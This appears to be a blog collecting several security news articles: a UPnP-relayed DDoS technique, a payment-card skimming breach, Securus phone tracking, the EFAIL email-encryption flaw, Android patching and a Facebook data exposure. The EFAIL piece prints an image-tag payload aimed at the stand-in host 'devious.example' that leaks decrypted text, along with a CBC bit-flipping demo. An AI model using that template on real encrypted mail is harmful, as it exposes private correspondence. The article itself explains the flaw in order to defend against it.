STE WILLIAMS

New DDoS Attack Method Leverages UPnP

‘Lock down UPnP routers,’ researchers say.

A new DDoS technique adds a fresh twist to this common threat and ups the chance that an attack will disrupt business operations. The attack leverages a known vulnerability in Universal Plug and Play (UPnP) to get around many current defense techniques and swamp a target’s network and servers.

The basis of the attack is a DNS amplification technique that bounces a DNS query response to the victim based on a spoofed requester address. In this new DDoS approach, though – detailed by researchers at Imperva – the amplified response is relayed through a UPnP router that is happy to forward requests from one external source to another (in violation of UPnP behavior rules). Relaying through the UPnP router means the data arrives on an unexpected UDP port from a spoofed IP address, making it more difficult to take simple, port-based action to shut down the traffic flood.

Both the original attack and the new proof of concept used DNS amplification, but the researchers note that there’s no technical reason a similar approach couldn’t be applied to SSDP and NTP amplification attacks as well.

When both source address and port are obfuscated, many current DDoS remediation techniques become ineffective. While deep packet inspection will work against the attack, it’s a resource-intensive method that can be both costly and limited. The researchers say that the most effective way to stop this attack method is for organizations to lock down their UPnP routers, taking a weapon out of the hands of attackers.
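
For admins who want to check their own kit, here is a minimal sketch in Python of the sort of probe that helps confirm whether a router answers UPnP discovery on its public-facing side – the precondition for the abuse described above. It assumes Python 3, that you run it from outside your own network, and that you know the router’s WAN address (the address below is a documentation placeholder, not a real target).

import socket

# SSDP discovery request for an Internet Gateway Device, sent over UDP.
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    "\r\n"
)

def upnp_exposed(wan_ip, timeout=3.0):
    """Return True if the router answers SSDP discovery on its WAN interface."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(MSEARCH.encode("ascii"), (wan_ip, 1900))
        data, _ = sock.recvfrom(4096)
        return data.startswith(b"HTTP/1.1 200 OK")   # SSDP replies look like HTTP
    except socket.timeout:
        return False                                  # no answer: UPnP not exposed (good)
    finally:
        sock.close()

if __name__ == "__main__":
    print(upnp_exposed("203.0.113.1"))  # placeholder WAN address - substitute your own

Any reply here means the router is willing to talk UPnP to the internet at large, which is exactly what the researchers recommend switching off.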

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/new-ddos-attack-method-leverages-upnp/d/d-id/1331799?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Rail Europe Notifies Riders of Three-Month Data Breach

Rail Europe North America alerts customers to a security incident in which hackers planted card-skimming malware on its website.

Rail Europe North America (RENA), a website Americans use to buy European train tickets, today confirmed a three-month data breach in which customers’ payment card data was compromised. RENA reports the incident began on November 29, 2017 and continued through February 16, 2018, when a bank inquiry informed the organization of an attack.

Attackers lifted RENA’s data with credit card-skimming malware placed on its website, a particularly concerning aspect of the incident, says Comparitech privacy advocate Paul Bischoff. In most data breaches, cybercriminals gain unauthorized access to a corporate database.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” he explains. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

Skimmers are usually placed on top of hardware so it seems like they are part of the payment portal, he says. This means just about all payment info was current when it was submitted – and the attackers took more than credit card numbers, expiration dates, and verification codes. They also stole name and gender info, delivery and invoicing addresses, email addresses, phone numbers, and in some cases, usernames and passwords.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/rail-europe-notifies-riders-of-three-month-data-breach/d/d-id/1331800?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Taming the Chaos of Application Security: ‘We Built an App for That’

Want to improve the state of secure software coding? Hide the complexity from developers.

We have decades of secure code development training behind us, the refinement of secure coding practices, and new application security testing and development tools coming to market annually. Yet one of the biggest and oldest barriers to developing secure software remains. What is it?

It’s the complexity of these tools, how they are managed, and how they integrate that creates unnecessary drudgery for development teams. We force developers to slog through so much that it keeps them from doing their job, which is to develop great software that people want to use.

This is what usually happens: As developers busily do their thing and build new applications and features, someone from security comes in the room and explains that a software assessment tool will be inserted in their pipeline. The tool throws off all kinds of false positives and irrelevant results, which, from the developers’ perspective, only get in the way and slow them down. If this process was ever scalable, it certainly isn’t in modern continuous delivery environments.

To succeed, security teams must take radically different — and more effective — approaches to help developers build more secure applications. This was what we did at Capital One, with considerable success.

Streamlining Application Security Processes
We had more than 3,500 different application teams, within seven separate lines of business, developing roughly 3,500 applications within their own continuous delivery pipelines. Each of these teams had significant flexibility regarding the tools that they chose to use and what languages they used for development. While productive, it was a form of managed chaos, with seven fully independent lines of business each essentially doing their own thing.

Our application security team, on the other hand, essentially consisted of a small pool of consultants. We were spending an inordinate amount of time just trying to get the Web application security tools up and running with each of the 3,500 teams. In addition to getting the software security assessment tools in place, the consultants would reach out to each application team to provide consulting and training. With so many development teams and different tools and languages in place, it just wasn’t scalable.

Another significant challenge for the application security team was the lack of a stick they could use to enforce good security development hygiene. Our security consultants would reach out to each development team and attempt to engage them for training, consult on effective development security practices, and try to convince them about the need to change practices. There was no way to force the development teams to actually engage and make these efforts work.

Fortunately, every developer and team at Capital One truly wanted to develop secure code. Unfortunately, the processes we had in place were too slow to be reasonably effective and timely. It would take three months from the initial contact with a development team to actually install and train the team on how to use the security assessment software. Not good enough.

The Solution? We Had to Transform the System
So, we did what developers do: we built an app for that. Then we provided teams an option that removed the burden of having to run their own application assessment tools. It was software security assessment-as-a-service for these internal teams, and all developers needed to do was sign up.

To secure their code, development teams would log into the system, send a single command through the API, and have themselves and their app registered for assessment. The system would then automatically pull the compiled code artifacts needed for the assessment, identify requirements and policy, and then orchestrate and manage the third-party scanning tools on the back end. The results from the assessment were then fed to the developer’s dashboard or pulled/pushed via an API. The good news for developers was that, aside from registering the app, they didn’t have to do anything to get high-quality assessment results.
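
To make that flow concrete, here is a purely hypothetical sketch of what the “single command” registration might look like from the developer’s side. The endpoint path, payload fields, and token handling are illustrative assumptions for this article, not Capital One’s actual internal API.

import json
import urllib.request

def register_app_for_assessment(api_base, token, app_name, artifact_source):
    """Register an app once; the service then pulls build artifacts and
    orchestrates the back-end scanning tools on its own schedule."""
    payload = json.dumps({"app": app_name, "artifact_source": artifact_source}).encode("utf-8")
    req = urllib.request.Request(
        url=api_base + "/v1/assessments/registrations",   # hypothetical endpoint
        data=payload,
        headers={
            "Content-Type": "application/json",
            "Authorization": "Bearer " + token,
        },
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        # e.g. {"registration_id": "...", "dashboard_url": "..."}
        return json.load(resp)

After that one call, everything else – artifact retrieval, tool orchestration, result filtering – happens behind the scenes, which is the whole point of the design.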

The application security team also used their expertise to filter assessment results so developers weren’t burdened with irrelevant outputs and false positives. Developers knew that what they received in the results were legitimate security concerns that needed to be resolved.

Of course, we didn’t roll this out all at once. Initially, we worked with one of the two largest teams at Capital One. Our goal in that initial pilot was to learn how to make a service that developers would really want to use. We took a novel approach and actually asked the development teams what they would want — including everything from the user interface to presentation of the results to the level of automation. Not so surprisingly, developers appreciated the fact that the system could be fully automated.

What was amazing was that developers loved the system. In fact, they loved it so much that they started telling other development teams.

We began the pilot at the beginning of 2017, and the initial two teams that used the system began telling other teams. As a result, we witnessed registrations accelerate through word of mouth. By the middle of 2017, the system went from two applications registered to 780 applications registered. All the while, we kept improving the service and developers continued to self-register.

We also added more software security assessment tools. Each new tool did certain types of assessment better than the others, so they all complemented one another. Most exciting of all, we could provide enhanced application security assessments and code review without developers having to change their day-to-day routines, even as we added new assessment and code composition tools.

Results: A Single Pipeline for Code Analysis Tools
The results speak for themselves: the application teams became our customers. And when all was said and done, by the end of 2017, we had 2,600 application development teams enrolled in the system. In contrast, in the year before the system was implemented, the company processed about 12,000 software security assessments. In the year we introduced this system, which we named “security code orchestration,” the company ramped up to run that same number of assessments per day and totaled nearly 400,000 software security assessments for the year.

For application security teams, this is a clear win. First, because all the software security assessment tool sets were abstracted away from the engineering teams, we could add or replace software security tools on the back end of the system with ease. This meant we could instantly improve the quality of assessments across the entire enterprise by improving the quality of our tools. The development teams wouldn’t even know a change was made. As we evolved the system, it became the single pipeline for code analysis tools, including non-security-related tasks such as code quality and license compliance. As such, we ended up going from secure code orchestration to code quality orchestration.

Most importantly, the entire organization was able to move from an ad hoc and a low level of software assessment coverage to more than 80% coverage. And, as it turned out, the software security teams didn’t need any kind of a stick — developers wanted a secure code pipeline because it was so easy to use and provided them value.

Caleb Sima has been engaged in the Internet security arena since 1994 and has become widely recognized as a leading expert in web security, penetration testing and the identification of emerging security threats. His pioneering efforts and expertise have helped define the web … View Full Bio

Article source: https://www.darkreading.com/application-security/taming-the-chaos-of-application-security-we-built-an-app-for-that/a/d-id/1331785?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Prison phone service can expose the location of anyone with a phone

In late April, somebody sent a letter containing meth to an inmate at an Arizona jail.

Tracking down the correspondent was no problem. Police looked at phone calls between the meth sender’s address and the inmate and then made an arrest, according to what Matthew Thomas, chief deputy of the Pinal County Sheriff’s Office, told the New York Times.

It was push-button easy thanks to the police having access to a location data lookup service from a company called Securus Technologies that provides and monitors calls to inmates. According to the Times, marketing documents show that the service, which is typically used by marketers and other businesses, gets the location data from major cellphone carriers, including AT&T, Sprint, T-Mobile and Verizon.

It’s far too easy to get that data, some say. Privacy experts, at least one legislator, and inmates’ families say the service, which is fed by data from a mobile marketing company called 3Cinteractive, enables users to look up the whereabouts of nearly any mobile phone in the country, within seconds, without verifying the warrants or affidavits that Securus requires users to upload.

The system is typically used by marketers who offer deals to people based on their location.

It brings back memories of a Google scheme, revealed last year, that aims to track users in real life. As Google announced at its annual Marketing Next conference in May 2017, it wants to go beyond just serving ads to consumers. Using an artificial intelligence (AI) tool called Attribution, it said it would follow us around to see where we go, tracking us across devices and channels – mobile, desktop and in physical stores – to see what we’re buying, to match purchases up with what ads we’ve seen, and to then automatically tell marketers what we’re up to and what ads have paid off.

The Electronic Privacy Information Center (EPIC) was none too happy about the idea. In short order, EPIC filed a complaint with the Federal Trade Commission (FTC) to stop Google from tracking in-store purchases.

Likewise, people whose locations have been allegedly tracked without legal authorization via Securus’s service aren’t happy about it either. In an ongoing federal prosecution, a Grand Jury has alleged that Cory Hutcheson, a former Missouri sheriff’s deputy, used Securus at least 11 times to look up people’s information without legal authority. He’s facing 11 counts of alleged forgery against targets that include a judge and members of the State Highway Patrol. Hutcheson was dismissed last year for a separate, unrelated matter, and he’s pleaded not guilty to surveillance and forgery charges.

Securus is one of the largest prison phone providers in the country. Its marketing material is, naturally, on the warm and fuzzy side: its phone service keeps inmates in touch with their families, it says, while location data helps to track down people afflicted with Alzheimer’s.

But as the ACLU notes, the company is also known for the steep costs of inmates’ calls, for limiting families to video-only visits, and for violating attorney-client privilege by recording phone calls between prisoners and their attorneys.

Last week, the company was in the limelight for what the ACLU calls “even more troubling practices.” Namely, as Senator Ron Wyden charged in letters made public on Friday, Securus is “[undermining] the privacy and civil liberties of millions upon millions of Americans.”

In those letters, Wyden demanded action from the Federal Communications Commission (FCC) and several major telecommunications companies, describing Securus’s ability to obtain and share the phone location data of virtually anyone who uses a phone.

Wyden says that Securus is buying real-time location data from the wireless carriers and providing it to the government through a self-service web portal “for nothing more than the legal equivalent of a pinky promise.”

All correctional officers have to do is go to the portal, enter any phone number, and then upload a document that purports to be an “official document giving permission” to get at the data.

A spokesman for Securus told the Times that the company requires customers to upload a legal document, such as a warrant or affidavit, and certify that the activity was authorized:

Securus is neither a judge nor a district attorney, and the responsibility of ensuring the legal adequacy of supporting documentation lies with our law enforcement customers and their counsel.

The spokesman also said that Securus restricts its services only to law enforcement and corrections facilities, and that not all officials at a given location have access to the system.

Wyden said in his letters that Securus officials told him that the company does nothing to verify that uploaded documents provide judicial authorization for real-time location surveillance. Nor do they conduct any review of surveillance requests. He also said that Securus was wrong when it said that it’s up to correctional facilities to make sure employees don’t misuse the web portal.

As pointed out by Ars Technica, the Supreme Court is now set to rule on the case of Carpenter v. United States: a case that aims, after years of confusion, to iron out what kind of privacy – if any – Americans can expect with regard to their phones’ location data.

Law enforcement in that case relied on vast amounts of data collected from cellphone companies that showed the movements of Timothy Ivory Carpenter, who police said was the ringleader of a robbery spree.

As of May 2015, a US court had ruled that police could access phone location data without a warrant. But that decision didn’t resolve the issue, given that it ran counter to rulings from lower courts in several states – including Montana, Maine, Minnesota, Massachusetts, and New Jersey – that phone records are constitutionally protected.

With all these contradictory laws, the question of what authorization, if any, law enforcement needs to get at our location data is legally complicated.

But why bother with the process at all? Securus’s service entirely cuts through the red tape, Wyden says:

It is incredibly troubling that Securus provides location data to the government at all – let alone that it does so without a verified court order or other legal process.

As you can see in a publicly available screenshot (PDF: page 30) of Securus’s online portal, the company simply requires an investigator to check a box to “certify the attached document is an official document giving permission to look up the location on this phone number requested.”

The investigator “then inputs the cellular number that is to be tracked and within seconds, the approximate location of the cell phone will be displayed on a graphical map of the area.”

In other words, just check a box.

So much easier than dealing with the Fourth Amendment.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/bJCpVtBe0qQ/

The EFAIL vulnerability – why it’s OK to keep on using email

This week’s bug of the month is the trendily-named EFAIL.

Like many groovy bugs these days, it’s both a BWAIN (bug with an impressive name) and a BWIVOL (bug with its very own logo, shown in the image at the top of this article).

The name is a pun of sorts on the word “email”, and the bug is caused by a flaw in the specifications set down for two popular standards used for email encryption, namely OpenPGP and S/MIME.

Simply put, the EFAIL vulnerabilities are a pair of security holes that a crook might be able to use to trick recipients of encrypted messages into leaking out some or all of their decrypted content.

Note that this attack only applies if you are using S/MIME or OpenPGP for end-to-end email encryption.

If you aren’t using either of these add-ons in your email client, this vulnerability doesn’t affect you – after all, if the crooks can sniff out your original messages and they’re not encrypted, they’ve got your plaintext already.

Note also that this attack doesn’t work on all messages; it doesn’t work in real time; you need a copy of the original encrypted message; it only works with some email clients; and it pretty much requires both HTML rendering and remote content download turned on in your email client.

Additionally, for one of the flavours of the attack, you have to know, or be able to guess correctly, some of the plaintext from the original message.

Technically speaking, these attacks aren’t strictly due to bugs, but rather to sloppy standards in S/MIME and OpenPGP that aren’t strict enough by design to inhibit this sort of “message tweaking”.

In the short term, you can expect updates to affected email clients that do their best to suppress these holes; in the long term, you should hope for improved standards for end-to-end email encryption.

In the immediate term, we’ve provided some steps below that you can take to protect yourself right now.

How EFAIL works

Here’s what you have to do, assuming that your victim is using a vulnerable email client:

  • Capture an encrypted message. You can do this as it’s being sent, during transit, or after delivery.
  • Modify the message subtly and then send it again. The alterations are chosen so that, after the message is unscrambled for display, it consists of the now-decrypted text wrapped inside a reference such as an image tag that links out to some external website.
  • Wait for the victim’s email client to fetch content from the maliciously-constructed web reference. Because the link is wrapped around decrypted text, the resulting URL used in the download request will leak plaintext.

One way to pull off this trick is summarised on the EFAIL web page: you replay the original encrypted MIME email message, but you insert unencrypted MIME body parts in HTML format above and below the encrypted chunk.

This means that the final decrypted message ends up sandwiched between two HTML fragments of your choice.

Imagine that your stolen-but-encrypted message body part looks like this:

--MIMESEPARATOR
Content-Type: [...encrypted...]
Content-Transfer-Encoding: base64

XXXXXXXXXXXX...[base64(encrypt(plaintext))]...XXXXXX

Assume that, after decryption, the message comes out as:

The secret plaintext revealed

Now, replay the encrypted message wrapped up as follows:

--MIMESEPARATOR
Content-Type: text/html

img src="http://devious.example/
--MIMESEPARATOR
Content-Type: [encrypted]
Content-Transfer-Encoding: base64

XXXXXXXXXXXX...[base64(encrypt(plaintext))]...XXXXXX
--MIMESEPARATOR
Content-Type: text/html

"

If the victim’s email client blindly stitches together the three extracted-decrypted-and-decoded-as-needed MIME body parts, the ready-for-display message ends up like this:

img src="http://devious.example/The secret plaintext revealed"

Now, if the email client decides to apply the Content-Type of text/html to the entire decrypted-and-stitched-together message, and if HTML message display is turned on, and if “fetch remote content” is enabled (either by default or because the recipient decides to click the [Fetch images] button or its equivalent in their mailer)…

…then their email client will issue an HTTP GET request to download the specified “image”, something like this:

GET /The%20secret%20plaintext%20revealed HTTP/1.1
Host: devious.example
User-Agent: [someidentifier]

See what you did there?

The victim just reached out via HTTP to your website, with a URL path consisting of the email message text after their email client had carefully and automatically unscrambled it.

You just pulled off a plaintext data leakage attack, essentially turning the encryption plugin against itself!

As the attacker, you could also serve back an innocent looking image (what’s known in the trade as a decoy), perhaps even tailored to your victim, in order to disguise the treachery you just pulled off.

Spaces aren’t allowed in URLs, so the original link in the IMG tag isn’t legal and can’t actually be used in an HTTP request. But web clients helpfully avoid this problem by automatically replacing spaces with the legal URL text %20, which is the hexadecimal equivalent of 32, the ASCII code for the space character. Of course, if there’s a quote mark somewhere in the decrypted text, the IMG link will be cut off early and might not work, and if the decrypted text is too long, the email client’s web downloader might truncate or refuse the resulting URL, but that would save you from a data breach by accident rather than by design.
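
If you want to see that escaping step in isolation, here is a tiny Python sketch (standard library only, nothing specific to any particular mail client): the leaked message text is percent-encoded on the way out and trivially decoded by whoever runs the web server.

from urllib.parse import quote, unquote

leaked_path = "/" + quote("The secret plaintext revealed")
print(leaked_path)            # /The%20secret%20plaintext%20revealed
print(unquote(leaked_path))   # /The secret plaintext revealed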

There’s another way

There’s a second way to trigger an EFAIL attack detailed in the paper, one that doesn’t require you to put new MIME body parts either side of the encrypted email.

We’re not going to explain it fully here, because the details are quite tricky, but the outcome is similar to the situation described above: you inject HTML tags into the decrypted text so that the final message contains web links in which the URLs wrap around data that’s supposed to be private.

If the email client treats the ready-to-use message as HTML and tries to render it for display by fetching remote content, the same data leakage happens as before because you receive a web request from the victim in which the URL path is a chunk of secret data, handily decrypted for you.

This second attack only works if you can modify some blocks of the original encrypted data in such a way as to control what comes out when you decrypt it; this, in turn, is only possible for encrypted blocks where you already know the decrypted version – what’s called a known plaintext attack.

Unfortunately, encrypted S/MIME body parts tend to start with the text string Content-type: multipart/signed, meaning that there’s almost always known plaintext to work with.

Any known plaintext of 16 bytes or longer is enough to inject one or more 16-byte blocks of chosen output into the decrypted stream (assuming the 16-bytes-per-block AES cipher is used in CBC or CFB mode), although this sort of modification also introduces 16 bytes of garbage each time, something that you need to keep in mind when choosing how to tweak the original message.
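
To make that block-tweaking idea concrete, here is an educational sketch using the third-party Python “cryptography” package. The key, messages and chosen injection are invented for illustration, and for simplicity the tampering is applied to the IV, which rewrites only the first block; tampering with a later ciphertext block works the same way but garbles the block before it, as described above.

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

key, iv = os.urandom(16), os.urandom(16)
known  = b"Content-type: mu"   # 16 bytes the attacker can predict
secret = b"very private txt"   # 16 bytes the attacker never sees
plaintext = known + secret

enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
ciphertext = enc.update(plaintext) + enc.finalize()

# Flip bits in the IV (the "previous block" for block 0) so the known
# first block decrypts to a chosen 16-byte string instead.
chosen = b'<img src="http:/'
tampered_iv = xor(iv, xor(known, chosen))

dec = Cipher(algorithms.AES(key), modes.CBC(tampered_iv)).decryptor()
print(dec.update(ciphertext) + dec.finalize())
# -> b'<img src="http:/very private txt'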

Ultimately, this means that it is technically possible, albeit tricky, to corrupt the encrypted data in such a way that short text strings are injected into the decrypted data, along with various fragments of garbage.

If the messed-up decryption were viewed as raw text, little harm would be done because the corruption would almost certainly be obvious.

What turns the modification into a potential attack is the possibility that the corrupted output might include sneakily-injected web links deliberately chosen to leak data.

What to do?

  • Check the EFAIL paper for a list of potentially vulnerable email clients. If yours is at risk, keep your eyes open for a patch that stops these attacks.
  • Turn off HTML email rendering in your email client. Note that it’s not sufficient to stop your mailer from sending HTML; you need to stop it processing HTML when you receive it. If you’re the sort of email user who finds the end-to-end encryption of S/MIME vital, you probably want HTML rendering off anyway, as a way of minimising the risk of any sort of HTML-based data exfiltration.
  • Turn off “show remote content” in your email client. If you must have HTML rendering turned on, at least ensure that you aren’t authorising your mailer to make outbound connections automatically. Autorendering remote content exposes you to lots of online risks, even if you don’t use S/MIME or OpenPGP.
  • Don’t accept encrypted messages that fail their integrity checks, or aren’t integrity protected. The second flavour of the EFAIL attack relies on modifying both the encrypted and decrypted text, and you shouldn’t trust an altered message anyway, whether the modifications were there to introduce dodgy HTML tags or not.
  • If you are a programmer, only ever use authenticated encryption algorithms from now on. Modern modes of encryption, such as AES-GCM, automatically encrypt and produce a message authentication code at the same time. That means you can always tell if anyone has messed with encrypted data.
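
As a minimal sketch of that last point in Python (using the third-party “cryptography” package; the key, nonce and message are made up for illustration), AES-GCM refuses to decrypt anything that has been tampered with:

import os
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)          # never reuse a nonce with the same key
aead = AESGCM(key)

ciphertext = aead.encrypt(nonce, b"The secret plaintext revealed", None)

tampered = bytearray(ciphertext)
tampered[0] ^= 0x01             # flip a single bit, as an attacker might

try:
    aead.decrypt(nonce, bytes(tampered), None)
except InvalidTag:
    print("Tampering detected: message rejected, no plaintext leaked")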


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/6oAl3xnHaCo/

The next Android version’s killer feature? Security patches

Big news for Android users – the next version of Google’s mobile OS will require device makers to agree to implement regular security patches for the first time in the operating system’s history.

For now, the only evidence we have for this development is a brief and easy-to-miss comment made at last week’s I/O conference by Android’s director of security, David Kleidermacher.

Still, his words don’t leave much wiggle room:

We’ve also worked on building security patching into our OEM agreements. Now this will really lead to a massive increase in the number of devices and users receiving regular security patches.

About time, security watchers will say, as they survey the mess of Android’s fragmentation, which, paradoxically, has grown more pronounced as the OS has matured in recent years.

That maturity has come at a price – a new version every year – which sounds great until you contemplate the consequences of large numbers of devices with security vulnerabilities that won’t or can’t be patched.

Android fragmentation happens on two axes at the same time, namely the annual updates to the OS (which add new features and architecture tweaks), and monthly security updates.

Consider that in the nine years between Android Cupcake in April 2009 and the forthcoming Android P, Google will have produced 14 versions of its mobile OS.

Granted, only a few of these will still be active in many countries, but even chopping out older incarnations would leave us with:

  • Version 5 (Lollipop) – November 2014
  • Version 6 (Marshmallow) – October 2015
  • Version 7 (Nougat) – August 2016
  • Version 8 (Oreo) – August 2017
  • Version 9 (Android P) – August 2018

Not forgetting all the point versions for each that sit in between these annual revisions. Even those running the latest version on a new phone face a problem of getting regular (or any) security updates – currently, only Google-branded devices receive monthly security fixes, which the company documents on its developer’s site.

One important reason for delayed or non-existent updates is that each hardware vendor has had to heavily customise Android to work with its devices.

Google’s answer from version 7 onwards was Project Treble, an updating architecture that separated the Android OS from hardware-specific code.

This has improved the frequency of patches for other vendors, but it’s still a long way from perfect with many Android devices months behind at best.

Kleidermacher’s comments indicate this is about to change. We still don’t know what “regular” will mean in practice but it’s hard to believe Google wouldn’t impose the same monthly cycle it works to for its own products.

This heralds a big culture change for Google’s relationship with device makers, which has traditionally been arm’s length by design.

The wrinkle for Google is that even smartphones that appear to have been patched, often haven’t, with researchers recently uncovering a wide variety of missing patches on devices that have officially been updated.

It’s a third and largely ignored level of fragmentation that underlines how difficult the issue has become for Google.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/VGsRN2HqADw/

Police dog sniffs out USB drive to snare school hacker

Thanks to a trained police dog sniffing out a thumb drive hidden inside a box of tissues, a high schooler in a San Francisco Bay area suburb has been accused of hacking grades: some students’ grades got bumped up, and some got elbowed down.

Local TV station KPIX reports that police in Concord – the eighth largest city in the area – say that the hack started with a phishing email.

The mail went out to teachers at Ygnacio Valley High School and linked to a website disguised to look like a Mount Diablo School District site. Concord Police Sergeant Carl Cruz told KPIX that the message prompted recipients to go to the bogus site and then…

…to log in to refresh your password or reset something.

…which one teacher did, thereby handing the hacker their login credentials.

Police aren’t releasing the name of the suspect, since he’s underage. They’re accusing him of using the teacher’s login to get into the electronic grading system and boost or lower 16 students’ grades. That includes his own grades, which he raised, police claim.

KPIX say that police traced an “electronic trail” – an IP address, one assumes – to the suspect’s house and searched it last Wednesday.

That’s where Doug the Dog and a USB drive tucked into a box of tissues come in. The K-9 is one of the few police dogs trained to sniff out electronic devices, and “that’s what he did,” Sergeant Cruz said.

We’ve previously written about another electronics-sniffing dog named Thoreau who helped to catch an alleged paedophile by sniffing out hidden hard drives.

At the time, a good number of readers were taken aback by that one, wondering whether the search that led to the arrest of the alleged paedophile was warranted and whether it might lead to scenarios such as police dogs randomly sniffing out hard drives “hidden” in travellers’ luggage. Would that make the luggage owner a suspect, given that the drive “could” or “might” contain child abuse materials?

One reader pondered:

The existence of a thumbdrive or external USB hard drive hardly seems sufficient to warrant accusations of this sort.

That’s an unlikely event, fortunately. Such searches require warrants.

As the Electronic Frontier Foundation (EFF) explains in its guide to police searches of computers or electronic media, the police can’t simply enter your home to search it or any electronic device inside, like a laptop or mobile phone, without a warrant.

The Law Enforcement Cyber Center (LECC) explains that warrants to seize or search digital devices or media require probable cause that they contain, or are, contraband, evidence of a crime, fruits of crime, or a tool to commit a crime.

Search warrants also require particularity: they have to describe the particular place to be searched and the specific items that police will seize. In the case of thumb drives, that means the content of the drive must be specified in the warrant as opposed to just referring to the drive itself. The LECC refers to US guidelines on searching and seizing computers and obtaining evidence in criminal investigations, which stipulate that…

When electronic storage media are to be searched because they store information that is evidence of a crime, the items to be seized under the warrant should usually focus on the content of the relevant files rather than the physical storage media…

[One approach] is to begin with an ‘all records’ description; add limiting language stating the crime, the suspects, and relevant time period, if applicable; include explicit examples of the records to be seized; and then indicate that the records may be seized in any form, whether electronic or non-electronic.

In some jurisdictions, judges or magistrates may impose specific conditions on how the search is to be executed or require police to explain how they plan to limit the search before the warrant may be granted.

At any rate, the high schooler’s dad told police that his son wasn’t up to anything malicious. He was just poking around in the school systems to see what he could do.

That, however, is no defense.

Curiosity in the young is generally considered a healthy trait but parents be warned: “poking around” is illegal without authorization. That, in fact, is encapsulated in a law known as the Computer Fraud and Abuse Act (CFAA).

Grade hacking and unauthorized computer access are illegal. They can lead to a visit from the FBI. They can lead to jail time.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/iZUH0B9J2Fs/

Facebook app left 3 million users’ data exposed for four years

Cambridge Analytica, burned to a crisp after being caught manhandling Facebook users’ data, finally blew away like ashes on 2 May.

Before it did, former employees had told Gizmodo that they knew the writing was on the wall for the data analytics company, but they didn’t realize how fast the flames would engulf it.

It felt unjust, they seemed to believe. They were just a “typical member of their industry caught in a media firestorm,” as Gizmodo put it. You can see why they’d feel unfairly singled out: in short order, it became clear that Cambridge Analytica wasn’t an aberration. A twin named Cubeyou turned up in April: yet another firm that dressed up its personal-data snarfing as “nonprofit academic research,” in the form of personality quizzes, and handed over the data to marketers.

And now, we have a triplet.

A New Scientist investigation has found that yet another popular Facebook personality app used as a research tool by academics and companies – this one is called myPersonality – fumbled the data of three million Facebook users, including their answers to intimate questionnaires.

Academics at the University of Cambridge distributed data from myPersonality to hundreds of researchers via a website with lousy security… and left it there for anybody to get at, for four years.

New Scientist described the data as being “highly sensitive, revealing personal details of Facebook users, such as the results of psychological tests.” It was meant to be stored and shared anonymously, but “such poor precautions were taken that deanonymising would not be hard,” it reports.

People had to register as a project collaborator to get access to the full data set, and more than 280 people from nearly 150 institutions did so, including university researchers and those from companies including Facebook, Google, Microsoft and Yahoo.

No permanent academic contract? No big-name company paying you to do research? No problem. For four years, there’s been a username and password to get at the data. The credentials have been sitting on the code-sharing website GitHub. A simple web search would lead you to the working credentials.

Besides being an academic project, myPersonality, like its personality quiz siblings, let commercial companies – or, at least, their researchers – get their hands on the data.

For its part, Cambridge Analytica accessed data from an app called This Is Your Digital Life, developed by Cambridge University professor Aleksandr Kogan, who’s at the center of the Cambridge Analytica allegations. (Kogan was previously on the myPersonality project, as well). As long as the researchers agreed to abide by strict data protection procedures and didn’t directly earn money from the data set, such companies were allowed access, according to New Scientist.

More than six million Facebook users completed the tests on myPersonality, and nearly half agreed to share data from their Facebook profiles with the project, according to the news outlet:

All of this data was then scooped up and the names removed before it was put on a website to share with other researchers. The terms allow the myPersonality team to use and distribute the data ‘in an anonymous manner such that the information cannot be traced back to the individual user’.

This, however, was not how the data was handled. Pam Dixon, with the World Privacy Forum, told New Scientist that besides posting a publicly available password to get at the data set, and besides allowing access to hundreds of researchers, the anonymization wasn’t up to snuff. Each Facebook user was given a unique ID that pulled together data including their age, gender, location, status updates, results on the personality quiz and more.

With all that, deanonymizing the data would be a snap, Dixon said. As we’ve written about, the more data you string together, the less time it takes to correlate it all to the point of being able to strip away anonymity.

Dixon, with regard to the data collected by the myPersonality app:

You could re-identify someone online from a status update, gender and date.

Facebook suspended myPersonality on 7 April. The app is currently under investigation for potentially having violated the platform’s policies due to the language used in the app and on its website to describe its data-sharing practices.

MyPersonality is only one of many: Facebook on Monday announced that it had suspended 200 apps so far in the app investigation and audit that CEO Mark Zuckerberg promised following the Cambridge Analytica scandal.

The Information Commissioner’s Office (ICO) is investigating myPersonality. In fact, the University of Cambridge told New Scientist that it was alerted to the issues surrounding myPersonality by the ICO. The university says the app was created before the data set’s controllers – David Stillwell and Michal Kosinski, at the University’s Psychometrics Centre – joined the university.

New Scientist quoted the university’s statement:

[The app] did not go through our ethical approval processes… The University of Cambridge does not own or control the app or data.

Readers, are any of you still using these types of Facebook personality quizzes? I’m expecting a “Hell, NO” strong enough to shake the halls over at Facebook headquarters, but please, do tell in the comments section below. If you’re staying the course, you might want to take a peek at our tips on How to protect your Facebook data.


